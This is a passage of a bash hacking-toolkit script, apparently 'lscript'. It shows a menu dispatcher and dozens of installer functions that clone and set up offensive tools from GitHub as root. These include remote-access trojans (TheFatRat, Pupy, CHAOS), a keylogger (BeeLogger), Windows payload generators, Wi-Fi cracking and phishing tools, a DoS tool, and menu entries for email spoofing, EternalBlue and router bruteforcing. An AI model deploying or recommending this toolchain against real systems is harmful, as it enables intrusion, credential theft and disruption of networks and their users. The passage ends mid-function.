  8391. clear
  8392. geolocate_ip "$IPG"
  8393. elif [[ "$YORNAA" = "18" ]]
  8394. then
  8395. browser_exploiting
  8396. elif [[ "$YORNAA" = "m" ]]
  8397. then
  8398. mitmf_hook
  8399. elif [[ "$YORNAA" = "g" ]]
  8400. then
  8401. find_gateways
  8402. elif [[ "$YORNAA" = "l" ]]
  8403. then
  8404. local_ips
  8405. elif [[ "$YORNAA" = "17" ]]
  8406. then
  8407. if [[ ! -f "/usr/local/bin/howdoi" ]]
  8408. then
  8409. echo -e ""$RS"Howdoi is not installed.type '"$CE""$YS"install"$CE""$RS"' to install it."
  8410. read INSTALL
  8411. if [[ "$INSTALL" = "install" ]]
  8412. then
  8413. install_howdoi
  8414. fi
  8415. else
  8416. clear
  8417. if [[ -f "$LPATH"/settings/dispfull.txt ]]
  8418. then
  8419. read dispfull < "$LPATH"/settings/dispfull.txt
  8420. if [[ "$dispfull" = "true" ]]
  8421. then
  8422. df="-a"
  8423. fi
  8424. else
  8425. df=""
  8426. fi
  8427. if [[ -f "$LPATH"/settings/colorout.txt ]]
  8428. then
  8429. read colorout < "$LPATH"/settings/colorout.txt
  8430. if [[ "$colorout" = "true" ]]
  8431. then
  8432. co="-c"
  8433. fi
  8434. else
  8435. co=""
  8436. fi
  8437. if [[ -f "$LPATH"/settings/onlylink.txt ]]
  8438. then
  8439. read onlylink < "$LPATH"/settings/onlylink.txt
  8440. if [[ "$onlylink" = "true" ]]
  8441. then
  8442. ol="-l"
  8443. fi
  8444. else
  8445. ol=""
  8446. fi
  8447. if [[ -f "$LPATH"/settings/numofans.txt ]]
  8448. then
  8449. read numofans < "$LPATH"/settings/numofans.txt
  8450. if [[ "$numofans" = "true" ]]
  8451. then
  8452. na="-n "$numofans""
  8453. fi
  8454. else
  8455. na=""
  8456. fi
  8457. echo -e "How do i : "
  8458. read HOW
  8459. howdoi $co $na $ol $df $HOW
  8460. fi
  8461. elif [[ "$YORNAA" = "settings" || "$YORNAA" = "s" ]]
  8462. then
  8463. settings_menu
  8464. elif [[ "$YORNAA" = "16" ]]
  8465. then
  8466. ngrok_option
  8467. BACKL=1
  8468. elif [[ "$YORNAA" = "donate" || "$YORNAA" = "d" ]]
  8469. then
  8470. donate_option
  8471. #------services
  8472. elif [[ "$YORNAA" = "pstart" ]]
  8473. then
  8474. service postgresql start && echo -e ""$YS"Done"$CE"" || echo -e ""$RS"Error"$CE""
  8475. elif [[ "$YORNAA" = "pstop" ]]
  8476. then
  8477. service postgresql stop && echo -e ""$YS"Done"$CE"" || echo -e ""$RS"Error"$CE""
  8478. elif [[ "$YORNAA" = "nstart" ]]
  8479. then
  8480. service network-manager start && echo -e ""$YS"Done"$CE"" || echo -e ""$RS"Error"$CE""
  8481. elif [[ "$YORNAA" = "nstop" ]]
  8482. then
  8483. service network-manager stop && echo -e ""$YS"Done"$CE"" || echo -e ""$RS"Error"$CE""
  8484. elif [[ "$YORNAA" = "astart" ]]
  8485. then
  8486. service apache2 start && echo -e ""$YS"Done"$CE"" || echo -e ""$RS"Error"$CE""
  8487. elif [[ "$YORNAA" = "astop" ]]
  8488. then
  8489. service apache2 stop && echo -e ""$YS"Done"$CE"" || echo -e ""$RS"Error"$CE""
  8490. elif [[ "$YORNAA" = "nessusstart" ]]
  8491. then
  8492. if [[ -f /etc/init.d/nessusd ]]
  8493. then
  8494. /etc/init.d/nessusd start && echo -e ""$YS"Done"$CE"" || echo -e ""$RS"Error"$CE""
  8495. else
  8496. echo -e ""$RS"Nessus is not already installed."$CE""
  8497. sleep 2
  8498. fi
  8499. elif [[ "$YORNAA" = "nessusstop" ]]
  8500. then
  8501. if [[ -f /etc/init.d/nessusd ]]
  8502. then
  8503. /etc/init.d/nessusd stop && echo -e ""$YS"Done"$CE"" || echo -e ""$RS"Error"$CE""
  8504. else
  8505. echo -e ""$RS"Nessus is not already installed."$CE""
  8506. sleep 2
  8507. fi
  8508. #-------------
  8509. elif [[ "$YORNAA" = "15" ]]
  8510. then
  8511. BACKL="1"
  8512. spoof_email
  8513. elif [[ "$YORNAA" = "ks" ]]
  8514. then
  8515. keyboard_shortcuts
  8516. elif [[ "$YORNAA" = "interface" ]]
  8517. then
  8518. interface_menu
  8519. elif [[ "$YORNAA" = "9" ]]
  8520. then
  8521. tools_menu
  8522. elif [[ "$YORNAA" = "l" ]]
  8523. then
  8524. clear
  8525. exec bash "$0"
  8526. elif [[ "$YORNAA" = "gg" ]]
  8527. then
  8528. geany /bin/lscript/l
  8529. elif [[ "$YORNAA" = "1" ]]
  8530. then
  8531. enable_wlan
  8532. elif [[ "$YORNAA" = "d1" ]]
  8533. then
  8534. check_wlans
  8535. if [[ "$WLANCHECKING" = "" ]]
  8536. then
  8537. echo -e ""$RS"Error. Could find $WLANN interface to disable."$CE""
  8538. else
  8539. disable_wlan
  8540. fi
  8541. elif [[ "$YORNAA" = "2" ]]
  8542. then
  8543. check_wlans
  8544. if [[ "$WLANCHECKING" = "" ]]
  8545. then
  8546. echo -e ""$RS"Error. Could find $WLANN interface."$CE""
  8547. else
  8548. echo -e "Enabling $WLANNM..."
  8549. echo -e "Killing services..."
  8550. (airmon-ng check kill &> /dev/null && echo -e "Done." ) || echo -e ""$RS"Error killing services"$YS""
  8551. echo -e "Starting monitor mode..."
  8552. (airmon-ng start $WLANN &>/dev/null && echo -e "Done" ) || echo -e "Error starting monitor mode."
  8553. fi
  8554. elif [[ "$YORNAA" = "d2" ]]
  8555. then
  8556. check_wlans
  8557. if [[ "$WLANMCHECKING" = "" ]]
  8558. then
  8559. echo -e ""$RS"Error. Could find $WLANNM interface."$CE""
  8560. else
  8561. stop_monitor
  8562. fi
  8563. elif [[ "$YORNAA" = "3" ]]
  8564. then
  8565. change_mac
  8566. elif [[ "$YORNAA" = "d3" ]]
  8567. then
  8568. interface_selection
  8569. clear
  8570. echo -e "Changing mac address of $MYINT to the original one..."
  8571. ifconfig $MYINT down
  8572. macchanger -p $MYINT
  8573. ifconfig $MYINT up
  8574. echo -e "Done."
  8575. elif [[ "$YORNAA" = "4" ]]
  8576. then
  8577. if [[ ! -f "/etc/init.d/anonym8.sh" ]]
  8578. then
  8579. echo -e ""$RS"Anonym8 is not installed.type '"$CE""$YS"install"$CE""$RS"' to install it."
  8580. read INSTALL
  8581. if [[ "$INSTALL" = "install" ]]
  8582. then
  8583. install_anonym8
  8584. fi
  8585. else
  8586. echo -e "Enabling anonym8..."
  8587. anonym8 start
  8588. echo -e "Done."
  8589. fi
  8590. elif [[ "$YORNAA" = "d4" ]]
  8591. then
  8592. if [[ ! -f "/etc/init.d/anonym8.sh" ]]
  8593. then
  8594. echo -e ""$RS"Anonym8 is not installed.type '"$CE""$YS"install"$CE""$RS"' to install it."
  8595. read INSTALL
  8596. if [[ "$INSTALL" = "install" ]]
  8597. then
  8598. install_anonym8
  8599. fi
  8600. else
  8601. echo -e "Disabling anonym8..."
  8602. anonym8 stop
  8603. echo -e "Done."
  8604. fi
  8605. elif [[ "$YORNAA" = "5" ]]
  8606. then
  8607. if [[ ! -f "/usr/bin/anonsurf" ]]
  8608. then
  8609. echo -e ""$RS"Anonsurf is not installed.type '"$CE""$YS"install"$CE""$RS"' to install it."
  8610. read INSTALL
  8611. if [[ "$INSTALL" = "install" ]]
  8612. then
  8613. install_anonsurf
  8614. fi
  8615. else
  8616. echo -e "Enabling anonsurf..."
  8617. anonsurf start
  8618. echo -e "Done."
  8619. fi
  8620. elif [[ "$YORNAA" = "d5" ]]
  8621. then
  8622. if [[ ! -f "/usr/bin/anonsurf" ]]
  8623. then
  8624. echo -e ""$RS"Anonsurf is not installed.type '"$CE""$YS"install"$CE""$RS"' to install it."
  8625. read INSTALL
  8626. if [[ "$INSTALL" = "install" ]]
  8627. then
  8628. install_anonsurf
  8629. fi
  8630. else
  8631. echo -e "Disabling anonsurf..."
  8632. anonsurf stop
  8633. echo -e "Done."
  8634. fi
  8635. elif [[ "$YORNAA" = "6" ]]
  8636. then
  8637. if [[ ! -f "/usr/bin/anonsurf" ]]
  8638. then
  8639. echo -e ""$RS"Anonsurf is not installed.type '"$CE""$YS"install"$CE""$RS"' to install it."
  8640. read INSTALL
  8641. if [[ "$INSTALL" = "install" ]]
  8642. then
  8643. install_anonsurf
  8644. fi
  8645. else
  8646. echo -e "Status of anonsurf..."
  8647. anonsurf status
  8648. echo -e "Done."
  8649. fi
  8650. elif [[ "$YORNAA" = "d6" ]]
  8651. then
  8652. if [[ ! -f "/usr/bin/anonsurf" ]]
  8653. then
  8654. echo -e ""$RS"Anonsurf is not installed.type '"$CE""$YS"install"$CE""$RS"' to install it."
  8655. read INSTALL
  8656. if [[ "$INSTALL" = "install" ]]
  8657. then
  8658. install_anonsurf
  8659. fi
  8660. else
  8661. echo -e "Restarting anonsurf..."
  8662. anonsurf change
  8663. echo -e "Done."
  8664. fi
  8665. elif [[ "$YORNAA" = "r6" ]]
  8666. then
  8667. if [[ ! -f "/usr/bin/anonsurf" ]]
  8668. then
  8669. echo -e ""$RS"Anonsurf is not installed.type '"$CE""$YS"install"$CE""$RS"' to install it."
  8670. read INSTALL
  8671. if [[ "$INSTALL" = "install" ]]
  8672. then
  8673. install_anonsurf
  8674. fi
  8675. else
  8676. echo -e "Restarting anonsurf..."
  8677. anonym8 change
  8678. echo -e "Done."
  8679. fi
  8680. elif [[ "$YORNAA" = "7" ]]
  8681. then
  8682. public_ip
  8683. elif [[ "$YORNAA" = "8" ]]
  8684. then
  8685. interface_selection
  8686. clear
  8687. echo "Your MACs: "
  8688. macchanger -s $MYINT
  8689. elif [[ "$YORNAA" = "10" || "$YORNAA" = "11" || "$YORNAA" = "12" ]]
  8690. then
  8691. new_terminal
  8692. elif [[ "$YORNAA" = "13" ]]
  8693. then
  8694. mitm_menu
  8695. elif [[ "$YORNAA" = "14" ]]
  8696. then
  8697. metasploit_menu
  8698. elif [[ "$YORNAA" = "20" ]]
  8699. then
  8700. bruteforce_router
  8701. elif [[ "$YORNAA" = "exit" ]]
  8702. then
  8703. kill -9 $PPID
  8704. exit
  8705. elif [[ "$YORNAA" = "update" ]]
  8706. then
  8707. printf '\033]2;UPDATE\a'
  8708. clear
  8709. update_lscript
  8710. elif [[ "$YORNAA" = "if" || "$YORNAA" = "ifconfig" ]]
  8711. then
  8712. ifconfig
  8713. elif [[ "$YORNAA" = "changelog" ]]
  8714. then
  8715. clear
  8716. BACKL=1
  8717. cat "$LPATH"/Changelog | head -n 20
  8718. echo -e "$PAKTC"
  8719. $READAK
  8720. clear
  8721. elif [[ "$YORNAA" = "" ]]
  8722. then
  8723. clear
  8724. exec bash "$0"
  8725. elif [[ "$YORNAA" = "errors" ]]
  8726. then
  8727. errors_menu
  8728. elif [[ "$YORNAA" = "etercheck" ]]
  8729. then
  8730. if [[ -d /root/wifiphisher ]]
  8731. then
  8732. eternalblue_check
  8733. else
  8734. echo -e ""$RS"Wifiphisher is not installed.Type '"$CE""$YS"install"$CE""$RS"' to install it."$CE""
  8735. read INSTALL
  8736. if [[ "$INSTALL" = "install" ]]
  8737. then
  8738. install_wifiphisher
  8739. fi
  8740. fi
  8741. elif [[ "$YORNAA" = "eternalblue" ]]
  8742. then
  8743. if [[ -d /root/wifiphisher ]]
  8744. then
  8745. eternalblue
  8746. else
  8747. echo -e ""$RS"Wifiphisher is not installed.Type '"$CE""$YS"install"$CE""$RS"' to install it."$CE""
  8748. read INSTALL
  8749. if [[ "$INSTALL" = "install" ]]
  8750. then
  8751. install_wifiphisher
  8752. fi
  8753. fi
  8754. elif [[ "$YORNAA" = "$wififb" ]]
  8755. then
  8756. if [[ -d /root/wifiphisher ]]
  8757. then
  8758. wififb
  8759. else
  8760. echo -e ""$RS"Wifiphisher is not installed.Type '"$CE""$YS"install"$CE""$RS"' to install it."$CE""
  8761. read INSTALL
  8762. if [[ "$INSTALL" = "install" ]]
  8763. then
  8764. install_wifiphisher
  8765. fi
  8766. fi
  8767. elif [[ "$YORNAA" = "start" ]]
  8768. then
  8769. start_menu
  8770. #----------
  8771. elif [[ "$YORNAA" = "stop" ]]
  8772. then
  8773. stop_menu
  8774. elif [[ "$YORNAA" = "exit" ]]
  8775. then
  8776. clear
  8777. exit
  8778. fi
  8779. ####check if it is ks
  8780. var1=1
  8781. check_if_ks
  8782. ####
  8783. }
  8784. #----------------TOOLS---------------
  8785. function install_fluxion
  8786. {
  8787. if [[ -d "/root/fluxion" ]]
  8788. then
  8789. echo -e "Removing old..."
  8790. echo -e "$PAKTC"
  8791. $READAK
  8792. rm -r /root/fluxion
  8793. fi
  8794. echo -e "Installing fluxion"
  8795. echo -e "Tool by Deltaxflux"
  8796. sleep 1
  8797. cd
  8798. git clone --recursive https://github.com/FluxionNetwork/fluxion.git
  8799. cd /root/fluxion
  8800. ./fluxion.sh
  8801. #~ wget https://fluxion.tk/fluxion-unstable.zip
  8802. #~ apt-get install -y unzip
  8803. #~ clear
  8804. #~ unzip /root/fluxion*.zip -d /root
  8805. #~ cd /root/fluxion/install
  8806. #~ chmod +x install.sh
  8807. #~ ./install.sh
  8808. }
  8809. function install_wifite
  8810. {
  8811. apt-get install -y wifite
  8812. }
  8813. function install_wifiphisher
  8814. {
  8815. if [[ -d "/root/wifiphisher" ]]
  8816. then
  8817. echo -e "Removing old..."
  8818. echo -e "$PAKTC"
  8819. $READAK
  8820. rm -r /root/wifiphisher
  8821. fi
  8822. echo -e "Installing Wifiphisher"
  8823. echo -e "Tool idea by Dan McInerney"
  8824. sleep 1
  8825. cd
  8826. git clone https://github.com/wifiphisher/wifiphisher.git
  8827. cd wifiphisher
  8828. sudo python setup.py install
  8829. sleep 1
  8830. }
  8831. function install_zatacker
  8832. {
  8833. echo -e "I cannot install Zatacker. Please google how to do that yourself."
  8834. echo -e "$PAKTGB"
  8835. read
  8836. }
  8837. function install_morpheus
  8838. {
  8839. if [[ -d "/root/morpheus" ]]
  8840. then
  8841. echo -e "Removing old..."
  8842. echo -e "$PAKTC"
  8843. $READAK
  8844. rm -r /root/morpheus
  8845. fi
  8846. echo -e "Installing Morpheus"
  8847. echo -e "Tool by Pedro ubuntu [ r00t-3xp10it ]"
  8848. sleep 1
  8849. cd
  8850. git clone https://github.com/r00t-3xp10it/morpheus.git
  8851. cd morpheus
  8852. chmod +x morpheus.sh
  8853. }
  8854. function install_osrframework
  8855. {
  8856. pip install osrframework
  8857. }
  8858. function install_hakku
  8859. {
  8860. if [[ -d "/root/hakkuframework" ]]
  8861. then
  8862. echo -e "Removing old..."
  8863. echo -e "$PAKTC"
  8864. $READAK
  8865. rm -r /root/hakkuframework
  8866. fi
  8867. echo -e "Installing Hakku"
  8868. echo -e "Tool by 4shadoww"
  8869. sleep 1
  8870. cd
  8871. git clone https://github.com/4shadoww/hakkuframework.git
  8872. cd hakkuframework
  8873. chmod +x hakku
  8874. chmod +x install
  8875. }
  8876. function install_trity
  8877. {
  8878. if [[ -d "/root/Trity" ]]
  8879. then
  8880. echo -e "Removing old..."
  8881. echo -e "$PAKTC"
  8882. $READAK
  8883. rm -r /root/Trity
  8884. fi
  8885. echo -e "Installing Trity"
  8886. echo -e "Tool by Toxic-ig"
  8887. sleep 1
  8888. git clone https://github.com/toxic-ig/Trity.git
  8889. cd Trity
  8890. sudo python install.py
  8891. }
  8892. function install_cupp
  8893. {
  8894. if [[ -d "/root/cupp" ]]
  8895. then
  8896. echo -e "Removing old..."
  8897. echo -e "$PAKTC"
  8898. $READAK
  8899. rm -r /root/cupp
  8900. fi
  8901. echo -e "Installing Cupp"
  8902. echo -e "Tool by Muris Kurgas"
  8903. sleep 1
  8904. cd
  8905. git clone https://github.com/Mebus/cupp.git
  8906. cd cupp
  8907. chmod +x cupp.py
  8908. }
  8909. function install_dracnmap
  8910. {
  8911. if [[ -d "/root/Dracnmap" ]]
  8912. then
  8913. echo -e "Removing old..."
  8914. echo -e "$PAKTC"
  8915. $READAK
  8916. rm -r /root/Dracnmap
  8917. fi
  8918. echo -e "Installing Dracnmap"
  8919. echo -e "Tool by Edo -maland-"
  8920. cd
  8921. git clone https://github.com/Screetsec/Dracnmap.git
  8922. cd Dracnmap
  8923. chmod +x Dracnmap.sh
  8924. }
  8925. function install_fern
  8926. {
  8927. if [[ -d "/root/Fern-Wifi-Cracker" ]]
  8928. then
  8929. echo -e "Removing old..."
  8930. echo -e "$PAKTC"
  8931. $READAK
  8932. rm -r /root/Fern-Wifi-Cracker
  8933. fi
  8934. echo -e "Installing Fern"
  8935. echo -e "Tool by Savio-code"
  8936. sleep 1
  8937. cd
  8938. svn checkout http://github.com/savio-code/fern-wifi-cracker/trunk/Fern-Wifi-Cracker/
  8939. cd Fern-Wifi-Cracker
  8940. chmod +x execute.py
  8941. }
  8942. function install_kickthemout
  8943. {
  8944. if [[ -d "/root/kickthemout" ]]
  8945. then
  8946. echo -e "Removing old..."
  8947. echo -e "$PAKTC"
  8948. $READAK
  8949. rm -r /root/kickthemout
  8950. fi
  8951. echo -e "Installing Kichthemout"
  8952. echo -e "Tool by Nikolaos Kamarinakis & David Schütz"
  8953. sleep 2
  8954. apt-get install -y nmap
  8955. git clone https://github.com/k4m4/kickthemout.git
  8956. cd kickthemout/
  8957. sudo python -m pip install -r requirements.txt
  8958. }
  8959. function install_ghostphisher
  8960. {
  8961. if [[ -d "/root/ghost-phisher" ]]
  8962. then
  8963. echo -e "Removing old..."
  8964. echo -e "$PAKTC"
  8965. $READAK
  8966. rm -r /root/ghost-phisher
  8967. fi
  8968. echo -e "Installing Ghost-Phisher"
  8969. echo -e "Tool by Savio-code"
  8970. sleep 1
  8971. cd
  8972. git clone https://github.com/savio-code/ghost-phisher.git
  8973. sleep 1
  8974. chmod +x /root/ghost-phisher/Ghost-Phisher/ghost.py
  8975. }
  8976. function install_theeye
  8977. {
  8978. if [[ -d "/root/The-Eye" ]]
  8979. then
  8980. echo -e "Removing old..."
  8981. echo -e "$PAKTC"
  8982. $READAK
  8983. rm -r /root/The-Eye
  8984. fi
  8985. echo -e "Installing The Eye"
  8986. echo -e "Tool by EgeBalci"
  8987. sleep 1
  8988. cd
  8989. git clone https://github.com/EgeBalci/The-Eye.git
  8990. cd The-Eye
  8991. chmod +x TheEye
  8992. }
  8993. function install_xerxes
  8994. {
  8995. if [[ -d "/root/xerxes" ]]
  8996. then
  8997. echo -e "Removing old..."
  8998. echo -e "$PAKTC"
  8999. $READAK
  9000. rm -r /root/xerxes
  9001. fi
  9002. echo -e "Installing Xerxes"
  9003. echo -e "Tool by zanyarjamal"
  9004. cd
  9005. git clone https://github.com/zanyarjamal/xerxes
  9006. cd xerxes
  9007. gcc xerxes.c -o xerxes
  9008. }
  9009. function install_mdk3
  9010. {
  9011. if [[ -d "/root/mdk3-master" ]]
  9012. then
  9013. echo -e "Removing old..."
  9014. echo -e "$PAKTC"
  9015. $READAK
  9016. rm -r /root/mdk3-master
  9017. fi
  9018. echo -e "Installing Mdk3-master"
  9019. echo -e "Tool by Musket Developer"
  9020. cd
  9021. git clone https://github.com/wi-fi-analyzer/mdk3-master.git
  9022. cd /root/mdk3-master
  9023. make
  9024. make install
  9025. }
  9026. function install_katana
  9027. {
  9028. if [[ -d "/root/KatanaFramework" ]]
  9029. then
  9030. echo -e "Removing old..."
  9031. echo -e "$PAKTC"
  9032. $READAK
  9033. rm -r /root/KatanaFramework
  9034. fi
  9035. echo -e "Installing Katana framework"
  9036. echo -e "Tool by PowerScript"
  9037. cd
  9038. git clone https://github.com/PowerScript/KatanaFramework.git
  9039. cd KatanaFramework
  9040. sh dependencies
  9041. python install
  9042. }
  9043. function install_airgeddon
  9044. {
  9045. if [[ -d "/root/airgeddon" ]]
  9046. then
  9047. echo -e "Removing old..."
  9048. echo -e "$PAKTC"
  9049. $READAK
  9050. rm -r /root/airgeddon
  9051. fi
  9052. echo -e "Installing..."
  9053. sleep 1
  9054. echo -e "Installing Airgeddon"
  9055. echo -e "Tool by v1s1t0r1sh3r3"
  9056. cd
  9057. git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
  9058. cd airgeddon
  9059. chmod +x airgeddon.sh
  9060. }
  9061. function install_4nonimizer
  9062. {
  9063. if [[ -d "/root/4nonimizer" ]]
  9064. then
  9065. echo -e "Removing old..."
  9066. echo -e "$PAKTC"
  9067. $READAK
  9068. rm -r /root/4nonimizer
  9069. fi
  9070. echo -e "Installing 4nonimizer"
  9071. echo -e "Tool by Hackplayers"
  9072. cd
  9073. git clone https://github.com/Hackplayers/4nonimizer.git
  9074. cd 4nonimizer
  9075. chmod +x 4nonimizer
  9076. ./4nonimizer install
  9077. clear
  9078. cd
  9079. apt-get install -y python-pip
  9080. apt-get install -y php-curl
  9081. gem install pcaprub
  9082. gem install packetfu
  9083. }
  9084. function install_beelogger
  9085. {
  9086. if [[ -d "/root/BeeLogger" ]]
  9087. then
  9088. echo -e "Removing old..."
  9089. echo -e "$PAKTC"
  9090. $READAK
  9091. rm -r /root/BeeLogger
  9092. fi
  9093. echo -e "Installing BeeLogger"
  9094. echo -e "Tool by Alisson Moretto - 4w4k3"
  9095. cd
  9096. git clone https://github.com/4w4k3/BeeLogger.git
  9097. cd BeeLogger
  9098. chmod +x install.sh
  9099. ./install.sh
  9100. cd
  9101. apt-get install -y python-pip
  9102. apt-get install -y php-curl
  9103. gem install pcaprub
  9104. gem install packetfu
  9105. clear
  9106. }
  9107. function install_ezsploit
  9108. {
  9109. if [[ -d "/root/ezsploit" ]]
  9110. then
  9111. echo -e "Removing old..."
  9112. echo -e "$PAKTC"
  9113. $READAK
  9114. rm -r /root/ezsploit
  9115. fi
  9116. echo -e "Installing Ezsploit"
  9117. echo -e "Tool by rand0m1ze"
  9118. git clone https://github.com/rand0m1ze/ezsploit.git
  9119. cd ezsploit/
  9120. chmod +x ezsploit.sh
  9121. }
  9122. function install_pupy
  9123. {
  9124. if [[ -d "/root/pupy" ]]
  9125. then
  9126. echo -e "Removing old..."
  9127. echo -e "$PAKTC"
  9128. $READAK
  9129. rm -r /root/pupy
  9130. fi
  9131. echo -e "Installing Pupy"
  9132. echo -e "Tool by n1nj4sec"
  9133. cd
  9134. git clone https://github.com/n1nj4sec/pupy.git
  9135. cd /root/pupy
  9136. git submodule init
  9137. git submodule update
  9138. cd /root/pupy/pupy
  9139. pip install -r requirements.txt
  9140. cd
  9141. }
  9142. function install_zirikatu
  9143. {
  9144. if [[ -d "/root/zirikatu" ]]
  9145. then
  9146. echo -e "Removing old..."
  9147. echo -e "$PAKTC"
  9148. $READAK
  9149. rm -r /root/zirikatu
  9150. fi
  9151. echo -e "Installing Zirikatu"
  9152. echo -e "Tool by pasahitz"
  9153. cd
  9154. git clone https://github.com/pasahitz/zirikatu.git
  9155. cd zirikatu
  9156. chmod +x zirikatu.sh
  9157. }
  9158. function install_wifiautopwner
  9159. {
  9160. if [[ -d "/root/WiFi-autopwner" ]]
  9161. then
  9162. echo -e "Removing old..."
  9163. echo -e "$PAKTC"
  9164. $READAK
  9165. rm -r /root/WiFi-autopwner
  9166. fi
  9167. echo -e "Installing WiFi-autopwner"
  9168. echo -e "Tool by Mi-Al"
  9169. cd
  9170. git clone https://github.com/Mi-Al/WiFi-autopwner.git
  9171. }
  9172. function install_bully
  9173. {
  9174. if [[ -d "/root/bully" ]]
  9175. then
  9176. echo -e "Removing old..."
  9177. echo -e "$PAKTC"
  9178. $READAK
  9179. rm -r /root/bully
  9180. fi
  9181. echo -e "Installing Bully"
  9182. echo -e "Tool by Aanarchyy"
  9183. cd
  9184. git clone https://github.com/aanarchyy/bully.git
  9185. cd /root/bully/src
  9186. make
  9187. sudo make install
  9188. cd
  9189. }
  9190. function install_anonsurf
  9191. {
  9192. if [[ -d "/root/kali-anonsurf" ]]
  9193. then
  9194. echo -e "Removing old..."
  9195. echo -e "$PAKTC"
  9196. $READAK
  9197. rm -r /root/kali-anonsurf
  9198. fi
  9199. cd
  9200. echo -e "Installing Anonsurf"
  9201. echo -e "Tool by Und3rf10w"
  9202. git clone https://github.com/Und3rf10w/kali-anonsurf.git
  9203. cd kali-anonsurf
  9204. chmod +x installer.sh
  9205. ./installer.sh
  9206. sleep 1
  9207. cd
  9208. }
  9209. function install_anonym8
  9210. {
  9211. if [[ -d "/root/anonym8" ]]
  9212. then
  9213. echo -e "Removing old..."
  9214. echo -e "$PAKTC"
  9215. $READAK
  9216. rm -r /root/anonym8
  9217. fi
  9218. echo -e "Installing Anonym8"
  9219. echo -e "Tool by HiroshiManRise"
  9220. git clone https://github.com/HiroshiManRise/anonym8.git
  9221. cd anonym8
  9222. chmod +x INSTALL.sh
  9223. ./INSTALL.sh
  9224. sleep 1
  9225. cd
  9226. }
  9227. function install_thefatrat
  9228. {
  9229. if [[ -d "/root/TheFatRat" ]]
  9230. then
  9231. echo -e "Removing old..."
  9232. echo -e "$PAKTC"
  9233. $READAK
  9234. rm -r /root/TheFatRat
  9235. fi
  9236. echo -e "Installing TheFatRat"
  9237. echo -e "Tool by Screetsec"
  9238. cd
  9239. git clone https://github.com/Screetsec/TheFatRat.git
  9240. cd TheFatRat
  9241. chmod +x setup.sh && ./setup.sh
  9242. cd
  9243. }
  9244. function install_angryip
  9245. {
  9246. cd
  9247. if [[ -f "/root/ipscan_*" ]]
  9248. then
  9249. echo -e "Removing old file"
  9250. sleep 2
  9251. rm -f /root/ipscan_*
  9252. fi
  9253. echo -e "Downloading angryipscanner"
  9254. sleep 2
  9255. wget https://github.com/angryip/ipscan/releases/download/3.5.1/ipscan_3.5.1_amd64.deb
  9256. echo -e "Installing..."
  9257. dpkg -i ipscan_*
  9258. echo -e "Done"
  9259. sleep 1
  9260. }
  9261. function install_sniper
  9262. {
  9263. if [[ -d /root/Sn1per ]]
  9264. then
  9265. echo -e "Removing old..."
  9266. echo -e "$PAKTC"
  9267. $READAK
  9268. rm -r /root/Sn1per
  9269. fi
  9270. echo -e "Installing Sn1per"
  9271. echo -e "Tool by 1N3"
  9272. cd
  9273. git clone https://github.com/1N3/Sn1per.git
  9274. cd /root/Sn1per
  9275. chmod +x install.sh
  9276. ./install.sh
  9277. cd
  9278. }
  9279. function install_recondog
  9280. {
  9281. if [[ -d /root/ReconDog ]]
  9282. then
  9283. echo -e "Removing old..."
  9284. echo -e "$PAKTC"
  9285. $READAK
  9286. rm -r /root/ReconDog
  9287. fi
  9288. cd
  9289. echo -e "Installing ReconDog"
  9290. echo -e "Tool by UltimateHackers"
  9291. git clone https://github.com/UltimateHackers/ReconDog.git
  9292. }
  9293. function install_redhawk
  9294. {
  9295. if [[ -d /root/RED_HAWK ]]
  9296. then
  9297. echo -e "Removing old..."
  9298. echo -e "$PAKTC"
  9299. $READAK
  9300. rm -r /root/RED_HAWK
  9301. fi
  9302. cd
  9303. echo -e "Installing RED HAWK"
  9304. echo -e "Tool by Tuhinshubhra"
  9305. git clone https://github.com/Tuhinshubhra/RED_HAWK.git
  9306. }
  9307. function install_winpayloads
  9308. {
  9309. if [[ -d /root/Winpayloads ]]
  9310. then
  9311. echo -e "Removing old..."
  9312. echo -e "$PAKTC"
  9313. $READAK
  9314. rm -r /root/Winpayloads
  9315. fi
  9316. cd
  9317. echo -e "Installing Winpayloads"
  9318. echo -e "Tool by Nccgroup"
  9319. git clone https://github.com/nccgroup/Winpayloads.git
  9320. cd /root/Winpayloads
  9321. chmod +x setup.sh
  9322. ./setup.sh
  9323. cd
  9324. }
  9325. function install_chaos
  9326. {
  9327. apt install golang upx-ucl -y
  9328. cd
  9329. if [[ -d /root/CHAOS ]]
  9330. then
  9331. echo -e "Removing old..."
  9332. echo -e "$PAKTC"
  9333. $READAK
  9334. rm -r /root/CHAOS
  9335. fi
  9336. git clone https://github.com/tiagorlampert/CHAOS.git
  9337. }
  9338. function install_routersploit
  9339. {
  9340. if [[ -d /root/routersploit ]]
  9341. then
  9342. echo -e "Removing old..."
  9343. echo -e "$PAKTC"
  9344. $READAK
  9345. rm -r /root/routersploit
  9346. fi
  9347. cd
  9348. echo -e "Installing routersploit"
  9349. echo -e "Tool by reverse-shell"
  9350. git clone https://github.com/reverse-shell/routersploit
  9351. cd /root/routersploit
  9352. pip install -r requirements.txt
  9353. cd
  9354. }
  9355. function install_infoga
  9356. {
  9357. if [[ -d /root/Infoga ]]
  9358. then
  9359. echo -e "Removing old..."
  9360. echo -e "$PAKTC"
  9361. $READAK
  9362. rm -r /root/Infoga
  9363. fi
  9364. git clone https://github.com/m4ll0k/Infoga.git
  9365. cd /root/Infoga
  9366. pip install -r requirements.txt
  9367. cd
  9368. }
  9369. function install_nwatch
  9370. {
  9371. if [[ -d /root/nWatch ]]
  9372. then
  9373. echo -e "Removing old..."
  9374. echo -e "$PAKTC"
  9375. $READAK
  9376. rm -r /root/nWatch
  9377. fi
  9378. cd
  9379. echo -e "Installing nWatch"
  9380. echo -e "Tool by Suraj"
  9381. git clone https://github.com/suraj-root/nWatch.git
  9382. pip install scapy
  9383. pip install colorama
  9384. pip install nmap
  9385. pip install ctypes
  9386. pip2.7 install scapy
  9387. pip2.7 install colorama
  9388. pip2.7 install nmap
  9389. pip2.7 install ctypes
  9390. }
  9391. function install_eternalscanner
  9392. {
  9393. if [[ -d /root/eternal_scanner ]]
  9394. then
  9395. echo -e "Removing old..."
  9396. echo -e "$PAKTC"
  9397. $READAK
  9398. rm -r /root/eternal_scanner
  9399. fi
  9400. cd
  9401. echo -e "Installing eternal_scanner"
  9402. echo -e "Tool by Peterpt"
  9403. git clone https://github.com/peterpt/eternal_scanner.git
  9404. apt-get install -y masscan metasploit-framework
  9405. }
  9406. function install_eaphammer
  9407. {
  9408. if [[ -d /root/eaphammer ]]
  9409. then
  9410. echo -e "Removing old..."
  9411. echo -e "$PAKTC"
  9412. $READAK
  9413. rm -r /root/eaphammer
  9414. fi
  9415. cd
